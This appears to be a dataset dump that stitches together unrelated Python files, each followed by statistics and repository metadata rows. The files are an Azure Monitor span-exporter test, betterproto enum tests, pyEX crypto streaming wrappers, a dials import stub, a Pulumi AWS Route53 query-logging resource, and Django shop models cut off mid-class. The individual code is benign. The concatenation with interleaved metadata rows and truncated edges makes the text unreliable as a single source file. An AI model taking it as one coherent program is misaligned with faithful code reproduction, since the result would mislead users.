"http.url": "https://www.wikipedia.org/wiki/Rabbit",
},
events=None,
links=[],
kind=SpanKind.SERVER,
)
span.start(start_time=start_time)
span.end(end_time=end_time)
span.status = Status(canonical_code=StatusCanonicalCode.UNKNOWN)
envelope = exporter._span_to_envelope(span)
self.assertEqual(envelope.data.base_data.response_code, "2")
self.assertFalse(envelope.data.base_data.success)
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "http",
"http.method": "GET",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
},
events=None,
links=[],
kind=SpanKind.CLIENT,
)
span.start(start_time=start_time)
span.end(end_time=end_time)
span.status = Status(canonical_code=StatusCanonicalCode.UNKNOWN)
envelope = exporter._span_to_envelope(span)
self.assertEqual(envelope.data.base_data.result_code, "2")
self.assertFalse(envelope.data.base_data.success)
# Server route attribute
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "HTTP",
"http.method": "GET",
"http.route": "/wiki/Rabbit",
"http.path": "/wiki/Rabbitz",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
"http.status_code": 400,
},
events=None,
links=[],
kind=SpanKind.SERVER,
)
span.start(start_time=start_time)
span.end(end_time=end_time)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
envelope = exporter._span_to_envelope(span)
self.assertEqual(
envelope.data.base_data.properties["request.name"],
"GET /wiki/Rabbit",
)
self.assertEqual(
envelope.data.base_data.properties["request.url"],
"https://www.wikipedia.org/wiki/Rabbit",
)
# Server method attribute missing
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "HTTP",
"http.path": "/wiki/Rabbitz",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
"http.status_code": 400,
},
events=None,
links=[],
kind=SpanKind.SERVER,
)
span.start(start_time=start_time)
span.end(end_time=end_time)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
envelope = exporter._span_to_envelope(span)
self.assertIsNone(envelope.data.base_data.name)
# Server route attribute missing
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "HTTP",
"http.method": "GET",
"http.path": "/wiki/Rabbitz",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
"http.status_code": 400,
},
events=None,
links=[],
kind=SpanKind.SERVER,
)
span.start(start_time=start_time)
span.end(end_time=end_time)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
envelope = exporter._span_to_envelope(span)
self.assertEqual(envelope.data.base_data.name, "GET")
self.assertEqual(
envelope.data.base_data.properties["request.name"],
"GET /wiki/Rabbitz",
)
self.assertEqual(
envelope.data.base_data.properties["request.url"],
"https://www.wikipedia.org/wiki/Rabbit",
)
# Server route and path attribute missing
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "HTTP",
"http.method": "GET",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
"http.status_code": 400,
},
events=None,
links=[],
kind=SpanKind.SERVER,
)
span.start(start_time=start_time)
span.end(end_time=end_time)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
envelope = exporter._span_to_envelope(span)
self.assertIsNone(
envelope.data.base_data.properties.get("request.name")
)
self.assertEqual(
envelope.data.base_data.properties["request.url"],
"https://www.wikipedia.org/wiki/Rabbit",
)
# Server http.url missing
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "HTTP",
"http.method": "GET",
"http.route": "/wiki/Rabbit",
"http.path": "/wiki/Rabbitz",
"http.status_code": 400,
},
events=None,
links=[],
kind=SpanKind.SERVER,
)
span.start(start_time=start_time)
span.end(end_time=end_time)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
envelope = exporter._span_to_envelope(span)
self.assertIsNone(envelope.data.base_data.url)
self.assertIsNone(
envelope.data.base_data.properties.get("request.url")
)
| 36.646266 | 79 | 0.573782 | 3,291 | 35,327 | 6.001215 | 0.076876 | 0.086582 | 0.110633 | 0.066835 | 0.858684 | 0.839038 | 0.83362 | 0.813063 | 0.806633 | 0.78638 | 0 | 0.098237 | 0.320831 | 35,327 | 963 | 80 | 36.68432 | 0.72492 | 0.021145 | 0 | 0.754484 | 0 | 0 | 0.136741 | 0.048572 | 0 | 0 | 0 | 0 | 0.143498 | 1 | 0.016816 | false | 0 | 0.013453 | 0 | 0.032511 | 0.001121 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fe21c435b281f82c8c723a7f7f3f6435ee624495 | 1,337 | py | Python | tests/inputs/oneof_enum/test_oneof_enum.py | theunkn0wn1/python-betterproto | cbd34370803a537743f6cdcadb9e5893781b137d | [
"MIT"
] | 1 | 2021-11-05T08:49:33.000Z | 2021-11-05T08:49:33.000Z | tests/inputs/oneof_enum/test_oneof_enum.py | theunkn0wn1/python-betterproto | cbd34370803a537743f6cdcadb9e5893781b137d | [
"MIT"
] | null | null | null | tests/inputs/oneof_enum/test_oneof_enum.py | theunkn0wn1/python-betterproto | cbd34370803a537743f6cdcadb9e5893781b137d | [
"MIT"
] | null | null | null | import pytest
import betterproto
from tests.output_betterproto.oneof_enum import (
Move,
Signal,
Test,
)
from tests.util import get_test_case_json_data
@pytest.mark.xfail
def test_which_one_of_returns_enum_with_default_value():
"""
returns first field when it is enum and set with default value
"""
message = Test()
message.from_json(get_test_case_json_data("oneof_enum", "oneof_enum-enum-0.json"))
assert message.move is None
assert message.signal == Signal.PASS
assert betterproto.which_one_of(message, "action") == ("signal", Signal.PASS)
@pytest.mark.xfail
def test_which_one_of_returns_enum_with_non_default_value():
"""
returns first field when it is enum and set with non default value
"""
message = Test()
message.from_json(get_test_case_json_data("oneof_enum", "oneof_enum-enum-1.json"))
assert message.move is None
assert message.signal == Signal.PASS
assert betterproto.which_one_of(message, "action") == ("signal", Signal.RESIGN)
@pytest.mark.xfail
def test_which_one_of_returns_second_field_when_set():
message = Test()
message.from_json(get_test_case_json_data("oneof_enum"))
assert message.move == Move(x=2, y=3)
assert message.signal == 0
assert betterproto.which_one_of(message, "action") == ("move", Move(x=2, y=3))
| 31.093023 | 86 | 0.729245 | 199 | 1,337 | 4.613065 | 0.236181 | 0.058824 | 0.065359 | 0.065359 | 0.812636 | 0.791939 | 0.765795 | 0.722222 | 0.722222 | 0.679739 | 0 | 0.006239 | 0.160808 | 1,337 | 42 | 87 | 31.833333 | 0.811943 | 0.096485 | 0 | 0.344828 | 0 | 0 | 0.091759 | 0.037383 | 0 | 0 | 0 | 0 | 0.310345 | 1 | 0.103448 | false | 0.103448 | 0.137931 | 0 | 0.241379 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
fe45f46170951254b2f2194660ee9f255c82f1f6 | 3,477 | py | Python | pyEX/marketdata/cryptocurrency.py | andrescevp/pyEX | 4c8daa411b01133a292d341a78f6e1b80cc2be99 | [
"Apache-2.0"
] | null | null | null | pyEX/marketdata/cryptocurrency.py | andrescevp/pyEX | 4c8daa411b01133a292d341a78f6e1b80cc2be99 | [
"Apache-2.0"
] | null | null | null | pyEX/marketdata/cryptocurrency.py | andrescevp/pyEX | 4c8daa411b01133a292d341a78f6e1b80cc2be99 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from enum import Enum
from .sse import _runSSE, _runSSEAsync
class CryptoSSE(Enum):
BOOK = "cryptoBook"
EVENTS = "cryptoEvents"
QUOTES = "cryptoQuotes"
@staticmethod
def options():
return list(map(lambda c: c.value, CryptoSSE))
def cryptoBookSSE(symbols=None, on_data=None, token="", version=""):
"""This returns a current snapshot of the book for a specified cryptocurrency. For REST, you will receive a current snapshot of the current book for the specific cryptocurrency. For SSE Streaming, you will get a full representation of the book updated as often as the book changes. Examples of each are below:
https://iexcloud.io/docs/api/#cryptocurrency-book
Args:
symbols (str): Tickers to request
on_data (function): Callback on data
token (str): Access token
version (str): API version
"""
return _runSSE("cryptoBook", symbols, on_data, token, version)
async def cryptoBookSSEAsync(symbols=None, token="", version=""):
"""This returns a current snapshot of the book for a specified cryptocurrency. For REST, you will receive a current snapshot of the current book for the specific cryptocurrency. For SSE Streaming, you will get a full representation of the book updated as often as the book changes. Examples of each are below:
https://iexcloud.io/docs/api/#cryptocurrency-book
Args:
symbols (str): Tickers to request
token (str): Access token
version (str): API version
"""
async for item in _runSSEAsync("cryptoBook", symbols, token, version):
yield item
def cryptoEventsSSE(symbols=None, on_data=None, token="", version=""):
"""This returns a streaming list of event updates such as new and canceled orders.
https://iexcloud.io/docs/api/#cryptocurrency-events
Args:
symbols (str): Tickers to request
on_data (function): Callback on data
token (str): Access token
version (str): API version
"""
return _runSSE("cryptoEvents", symbols, on_data, token, version)
async def cryptoEventsSSEAsync(symbols=None, token="", version=""):
"""This returns a streaming list of event updates such as new and canceled orders.
https://iexcloud.io/docs/api/#cryptocurrency-events
Args:
symbols (str): Tickers to request
token (str): Access token
version (str): API version
"""
async for item in _runSSEAsync("cryptoEvents", symbols, token, version):
yield item
def cryptoQuotesSSE(symbols=None, on_data=None, token="", version=""):
"""This returns the quote for a specified cryptocurrency. Quotes are available via REST and SSE Streaming.
https://iexcloud.io/docs/api/#cryptocurrency-quote
Args:
symbols (str): Tickers to request
on_data (function): Callback on data
token (str): Access token
version (str): API version
"""
return _runSSE("cryptoQuotes", symbols, on_data, token, version)
async def cryptoQuotesSSEAsync(symbols=None, token="", version=""):
"""This returns the quote for a specified cryptocurrency. Quotes are available via REST and SSE Streaming.
https://iexcloud.io/docs/api/#cryptocurrency-quote
Args:
symbols (str): Tickers to request
token (str): Access token
version (str): API version
"""
async for item in _runSSEAsync("cryptoQuotes", symbols, token, version):
yield item
| 34.425743 | 313 | 0.685649 | 445 | 3,477 | 5.319101 | 0.206742 | 0.091255 | 0.040558 | 0.050697 | 0.850021 | 0.838192 | 0.809041 | 0.761301 | 0.761301 | 0.754119 | 0 | 0.000368 | 0.217429 | 3,477 | 100 | 314 | 34.77 | 0.869533 | 0.319241 | 0 | 0.125 | 0 | 0 | 0.084577 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.083333 | 0.041667 | 0.583333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
22da48482112c7628a5b620605be4e06b37f2e6a | 208 | py | Python | modules/dials/algorithms/polygon/spatial_interpolation.py | jorgediazjr/dials-dev20191018 | 77d66c719b5746f37af51ad593e2941ed6fbba17 | [
"BSD-3-Clause"
] | null | null | null | modules/dials/algorithms/polygon/spatial_interpolation.py | jorgediazjr/dials-dev20191018 | 77d66c719b5746f37af51ad593e2941ed6fbba17 | [
"BSD-3-Clause"
] | null | null | null | modules/dials/algorithms/polygon/spatial_interpolation.py | jorgediazjr/dials-dev20191018 | 77d66c719b5746f37af51ad593e2941ed6fbba17 | [
"BSD-3-Clause"
] | 1 | 2020-02-04T15:39:06.000Z | 2020-02-04T15:39:06.000Z | from __future__ import absolute_import, division, print_function
from dials_algorithms_polygon_ext import *
from dials_algorithms_polygon_spatial_interpolation_ext import *
from scitbx.array_family import *
| 34.666667 | 64 | 0.879808 | 27 | 208 | 6.222222 | 0.592593 | 0.107143 | 0.22619 | 0.309524 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.091346 | 208 | 5 | 65 | 41.6 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.25 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
a3af81f9091c3cbfe5e9a41d5f3dfff1b55c8277 | 14,120 | py | Python | sdk/python/pulumi_aws/route53/query_log.py | chivandikwa/pulumi-aws | 19c08bf9dcb90544450ffa4eec7bf6751058fde2 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2021-11-10T16:33:40.000Z | 2021-11-10T16:33:40.000Z | sdk/python/pulumi_aws/route53/query_log.py | chivandikwa/pulumi-aws | 19c08bf9dcb90544450ffa4eec7bf6751058fde2 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_aws/route53/query_log.py | chivandikwa/pulumi-aws | 19c08bf9dcb90544450ffa4eec7bf6751058fde2 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['QueryLogArgs', 'QueryLog']
@pulumi.input_type
class QueryLogArgs:
def __init__(__self__, *,
cloudwatch_log_group_arn: pulumi.Input[str],
zone_id: pulumi.Input[str]):
"""
The set of arguments for constructing a QueryLog resource.
:param pulumi.Input[str] cloudwatch_log_group_arn: CloudWatch log group ARN to send query logs.
:param pulumi.Input[str] zone_id: Route53 hosted zone ID to enable query logs.
"""
pulumi.set(__self__, "cloudwatch_log_group_arn", cloudwatch_log_group_arn)
pulumi.set(__self__, "zone_id", zone_id)
@property
@pulumi.getter(name="cloudwatchLogGroupArn")
def cloudwatch_log_group_arn(self) -> pulumi.Input[str]:
"""
CloudWatch log group ARN to send query logs.
"""
return pulumi.get(self, "cloudwatch_log_group_arn")
@cloudwatch_log_group_arn.setter
def cloudwatch_log_group_arn(self, value: pulumi.Input[str]):
pulumi.set(self, "cloudwatch_log_group_arn", value)
@property
@pulumi.getter(name="zoneId")
def zone_id(self) -> pulumi.Input[str]:
"""
Route53 hosted zone ID to enable query logs.
"""
return pulumi.get(self, "zone_id")
@zone_id.setter
def zone_id(self, value: pulumi.Input[str]):
pulumi.set(self, "zone_id", value)
@pulumi.input_type
class _QueryLogState:
def __init__(__self__, *,
arn: Optional[pulumi.Input[str]] = None,
cloudwatch_log_group_arn: Optional[pulumi.Input[str]] = None,
zone_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering QueryLog resources.
:param pulumi.Input[str] arn: The Amazon Resource Name (ARN) of the Query Logging Config.
:param pulumi.Input[str] cloudwatch_log_group_arn: CloudWatch log group ARN to send query logs.
:param pulumi.Input[str] zone_id: Route53 hosted zone ID to enable query logs.
"""
if arn is not None:
pulumi.set(__self__, "arn", arn)
if cloudwatch_log_group_arn is not None:
pulumi.set(__self__, "cloudwatch_log_group_arn", cloudwatch_log_group_arn)
if zone_id is not None:
pulumi.set(__self__, "zone_id", zone_id)
@property
@pulumi.getter
def arn(self) -> Optional[pulumi.Input[str]]:
"""
The Amazon Resource Name (ARN) of the Query Logging Config.
"""
return pulumi.get(self, "arn")
@arn.setter
def arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "arn", value)
@property
@pulumi.getter(name="cloudwatchLogGroupArn")
def cloudwatch_log_group_arn(self) -> Optional[pulumi.Input[str]]:
"""
CloudWatch log group ARN to send query logs.
"""
return pulumi.get(self, "cloudwatch_log_group_arn")
@cloudwatch_log_group_arn.setter
def cloudwatch_log_group_arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cloudwatch_log_group_arn", value)
@property
@pulumi.getter(name="zoneId")
def zone_id(self) -> Optional[pulumi.Input[str]]:
"""
Route53 hosted zone ID to enable query logs.
"""
return pulumi.get(self, "zone_id")
@zone_id.setter
def zone_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "zone_id", value)
class QueryLog(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cloudwatch_log_group_arn: Optional[pulumi.Input[str]] = None,
zone_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a Route53 query logging configuration resource.
> **NOTE:** There are restrictions on the configuration of query logging. Notably,
the CloudWatch log group must be in the `us-east-1` region,
a permissive CloudWatch log resource policy must be in place, and
the Route53 hosted zone must be public.
See [Configuring Logging for DNS Queries](https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/query-logs.html?console_help=true#query-logs-configuring) for additional details.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
import pulumi_pulumi as pulumi
# Example CloudWatch log group in us-east-1
us_east_1 = pulumi.providers.Aws("us-east-1", region="us-east-1")
aws_route53_example_com = aws.cloudwatch.LogGroup("awsRoute53ExampleCom", retention_in_days=30,
opts=pulumi.ResourceOptions(provider=aws["us-east-1"]))
# Example CloudWatch log resource policy to allow Route53 to write logs
# to any log group under /aws/route53/*
route53_query_logging_policy_policy_document = aws.iam.get_policy_document(statements=[aws.iam.GetPolicyDocumentStatementArgs(
actions=[
"logs:CreateLogStream",
"logs:PutLogEvents",
],
resources=["arn:aws:logs:*:*:log-group:/aws/route53/*"],
principals=[aws.iam.GetPolicyDocumentStatementPrincipalArgs(
identifiers=["route53.amazonaws.com"],
type="Service",
)],
)])
route53_query_logging_policy_log_resource_policy = aws.cloudwatch.LogResourcePolicy("route53-query-logging-policyLogResourcePolicy",
policy_document=route53_query_logging_policy_policy_document.json,
policy_name="route53-query-logging-policy",
opts=pulumi.ResourceOptions(provider=aws["us-east-1"]))
# Example Route53 zone with query logging
example_com_zone = aws.route53.Zone("exampleComZone")
example_com_query_log = aws.route53.QueryLog("exampleComQueryLog",
cloudwatch_log_group_arn=aws_route53_example_com.arn,
zone_id=example_com_zone.zone_id,
opts=pulumi.ResourceOptions(depends_on=[route53_query_logging_policy_log_resource_policy]))
```
## Import
Route53 query logging configurations can be imported using their ID, e.g.,
```sh
$ pulumi import aws:route53/queryLog:QueryLog example_com xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] cloudwatch_log_group_arn: CloudWatch log group ARN to send query logs.
:param pulumi.Input[str] zone_id: Route53 hosted zone ID to enable query logs.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: QueryLogArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Route53 query logging configuration resource.
> **NOTE:** There are restrictions on the configuration of query logging. Notably,
the CloudWatch log group must be in the `us-east-1` region,
a permissive CloudWatch log resource policy must be in place, and
the Route53 hosted zone must be public.
See [Configuring Logging for DNS Queries](https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/query-logs.html?console_help=true#query-logs-configuring) for additional details.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
import pulumi_pulumi as pulumi
# Example CloudWatch log group in us-east-1
us_east_1 = pulumi.providers.Aws("us-east-1", region="us-east-1")
aws_route53_example_com = aws.cloudwatch.LogGroup("awsRoute53ExampleCom", retention_in_days=30,
opts=pulumi.ResourceOptions(provider=aws["us-east-1"]))
# Example CloudWatch log resource policy to allow Route53 to write logs
# to any log group under /aws/route53/*
route53_query_logging_policy_policy_document = aws.iam.get_policy_document(statements=[aws.iam.GetPolicyDocumentStatementArgs(
actions=[
"logs:CreateLogStream",
"logs:PutLogEvents",
],
resources=["arn:aws:logs:*:*:log-group:/aws/route53/*"],
principals=[aws.iam.GetPolicyDocumentStatementPrincipalArgs(
identifiers=["route53.amazonaws.com"],
type="Service",
)],
)])
route53_query_logging_policy_log_resource_policy = aws.cloudwatch.LogResourcePolicy("route53-query-logging-policyLogResourcePolicy",
policy_document=route53_query_logging_policy_policy_document.json,
policy_name="route53-query-logging-policy",
opts=pulumi.ResourceOptions(provider=aws["us-east-1"]))
# Example Route53 zone with query logging
example_com_zone = aws.route53.Zone("exampleComZone")
example_com_query_log = aws.route53.QueryLog("exampleComQueryLog",
cloudwatch_log_group_arn=aws_route53_example_com.arn,
zone_id=example_com_zone.zone_id,
opts=pulumi.ResourceOptions(depends_on=[route53_query_logging_policy_log_resource_policy]))
```
## Import
Route53 query logging configurations can be imported using their ID, e.g.,
```sh
$ pulumi import aws:route53/queryLog:QueryLog example_com xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
```
:param str resource_name: The name of the resource.
:param QueryLogArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(QueryLogArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cloudwatch_log_group_arn: Optional[pulumi.Input[str]] = None,
zone_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = QueryLogArgs.__new__(QueryLogArgs)
if cloudwatch_log_group_arn is None and not opts.urn:
raise TypeError("Missing required property 'cloudwatch_log_group_arn'")
__props__.__dict__["cloudwatch_log_group_arn"] = cloudwatch_log_group_arn
if zone_id is None and not opts.urn:
raise TypeError("Missing required property 'zone_id'")
__props__.__dict__["zone_id"] = zone_id
__props__.__dict__["arn"] = None
super(QueryLog, __self__).__init__(
'aws:route53/queryLog:QueryLog',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
arn: Optional[pulumi.Input[str]] = None,
cloudwatch_log_group_arn: Optional[pulumi.Input[str]] = None,
zone_id: Optional[pulumi.Input[str]] = None) -> 'QueryLog':
"""
Get an existing QueryLog resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: The Amazon Resource Name (ARN) of the Query Logging Config.
:param pulumi.Input[str] cloudwatch_log_group_arn: CloudWatch log group ARN to send query logs.
:param pulumi.Input[str] zone_id: Route53 hosted zone ID to enable query logs.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _QueryLogState.__new__(_QueryLogState)
__props__.__dict__["arn"] = arn
__props__.__dict__["cloudwatch_log_group_arn"] = cloudwatch_log_group_arn
__props__.__dict__["zone_id"] = zone_id
return QueryLog(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
The Amazon Resource Name (ARN) of the Query Logging Config.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="cloudwatchLogGroupArn")
def cloudwatch_log_group_arn(self) -> pulumi.Output[str]:
"""
CloudWatch log group ARN to send query logs.
"""
return pulumi.get(self, "cloudwatch_log_group_arn")
@property
@pulumi.getter(name="zoneId")
def zone_id(self) -> pulumi.Output[str]:
"""
Route53 hosted zone ID to enable query logs.
"""
return pulumi.get(self, "zone_id")
| 43.446154 | 189 | 0.655807 | 1,682 | 14,120 | 5.239596 | 0.12604 | 0.07228 | 0.09191 | 0.097697 | 0.821854 | 0.798026 | 0.772495 | 0.759333 | 0.753546 | 0.744015 | 0 | 0.01123 | 0.249504 | 14,120 | 324 | 190 | 43.580247 | 0.820421 | 0.476133 | 0 | 0.492537 | 1 | 0 | 0.108571 | 0.053406 | 0 | 0 | 0 | 0 | 0 | 1 | 0.149254 | false | 0.007463 | 0.037313 | 0 | 0.276119 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a3d2a049d627d78cec60f3f575e2f7ec8fbb5173 | 10,291 | py | Python | data/models.py | CodeMonk263/Live-Mart-Backend | 39f6e6b9dcb686a8b02313b289456f30e4b99f1c | [
"MIT"
] | null | null | null | data/models.py | CodeMonk263/Live-Mart-Backend | 39f6e6b9dcb686a8b02313b289456f30e4b99f1c | [
"MIT"
] | null | null | null | data/models.py | CodeMonk263/Live-Mart-Backend | 39f6e6b9dcb686a8b02313b289456f30e4b99f1c | [
"MIT"
] | null | null | null | from django.db import models
# Create your models here
from django.db import models
from django.conf import settings
from accounts.models import User
class Shop(models.Model):
id = models.IntegerField(primary_key=True, default=1)
username = models.ForeignKey(User, related_name="owner_name", on_delete=models.CASCADE, null=True, blank=True)
name = models.CharField(max_length=50, null=True, blank=True)
shop_lat = models.FloatField(default=0.0)
shop_long = models.FloatField(default=0.0)
address = models.TextField(max_length = 300, null=True, blank=True)
delIds = models.ManyToManyField(User, related_name="delivery_persons", null=True, blank=True)
def __str__(self):
return str(self.name)
class Categories(models.Model):
id = models.IntegerField(primary_key=True, default=1)
image = models.TextField(default=None, null=True, blank=True, max_length=3000)
name = models.CharField(max_length=50, null=True, blank=True)
def __str__(self):
return str(self.name)
class Brands(models.Model):
id = models.IntegerField(primary_key=True, default=1)
image = models.TextField(default=None, null=True, blank=True, max_length=3000)
name = models.CharField(max_length=50, null=True, blank=True)
def __str__(self):
return str(self.name)
# Create your models here.
class Product(models.Model):
id = models.IntegerField(primary_key=True, default=1)
username = models.ForeignKey(User, related_name="wholeseller_name", on_delete=models.CASCADE, null=True, blank=True)
name = models.CharField(max_length=500, null=True, blank=True)
quantity = models.IntegerField(default=0)
defaultProductId = models.ForeignKey("DefaultProduct", null=True, blank=True)
shopId = models.ForeignKey(Shop, on_delete=models.CASCADE, default=None, null=True, blank=True)
shopName = models.CharField(null=True, blank=True, default="Shop Name", max_length=60)
wholesale_price = models.FloatField(default=0.0)
wholesale_mrp = models.FloatField(default=0.0)
rating = models.FloatField(default=0.0)
image = models.TextField(default=None, null=True, blank=True, max_length=3000)
category = models.ForeignKey(Categories, null=True, blank=True)
brand = models.ForeignKey(Brands, null=True, blank=True)
unit = models.CharField(max_length=10, default="kg", null=True, blank=True)
def __str__(self):
return str(self.name)
class RetailProduct(models.Model):
id = models.IntegerField(primary_key=True, default=1)
retailer = models.ForeignKey(User, on_delete=models.CASCADE, null=True, blank=True)
quantity = models.IntegerField()
shopId = models.ForeignKey(Shop, on_delete=models.CASCADE, default=None, null=True, blank=True)
shopName = models.CharField(null=True, blank=True, default="Shop Name", max_length=60)
productId = models.ForeignKey(Product, on_delete=models.CASCADE)
productName = models.CharField(max_length=50, null=True, blank=True)
category = models.ForeignKey(Categories, null=True, blank=True)
brand = models.ForeignKey(Brands, null=True, blank=True)
retail_price = models.FloatField(default=0.0)
retail_mrp = models.FloatField(default=0.0)
rating = models.FloatField(default=0.0)
def __str__(self):
return str(self.productId)
class DefaultProduct(models.Model):
id = models.IntegerField(primary_key=True, default=1)
name = models.CharField(max_length=500)
rating = models.FloatField(default=0.0)
category = models.ForeignKey(Categories, null=True, blank=True)
brand = models.ForeignKey(Brands, null=True, blank=True)
image = models.TextField(default=None, null=True, blank=True, max_length=3000)
unit = models.CharField(max_length=10, default="kg")
wholesellers = models.ManyToManyField(Product, null=True, blank=True)
retailers = models.ManyToManyField(RetailProduct, null=True, blank=True)
def __str__(self):
return str(self.name)
class Review(models.Model):
id = models.IntegerField(primary_key=True, default=1)
productId = models.ForeignKey(Product, on_delete=models.CASCADE)
productName = models.CharField(max_length=50, null=True, blank=True)
shopId = models.ForeignKey(Shop, null=True, blank=True)
shopName = models.CharField(null=True, blank=True, default="Shop Name", max_length=60)
username = models.ForeignKey(User, on_delete=models.CASCADE, null=True, blank=True)
name = models.CharField(null=True, blank=True, default="Default Name", max_length=50)
stars = models.IntegerField()
review = models.TextField(max_length=1000)
date = models.CharField(max_length=50, null=True, blank=True)
def __str__(self):
return str(self.productId)
class RetailReview(models.Model):
id = models.IntegerField(primary_key=True, default=1)
retailProductId = models.ForeignKey(RetailProduct, on_delete=models.CASCADE)
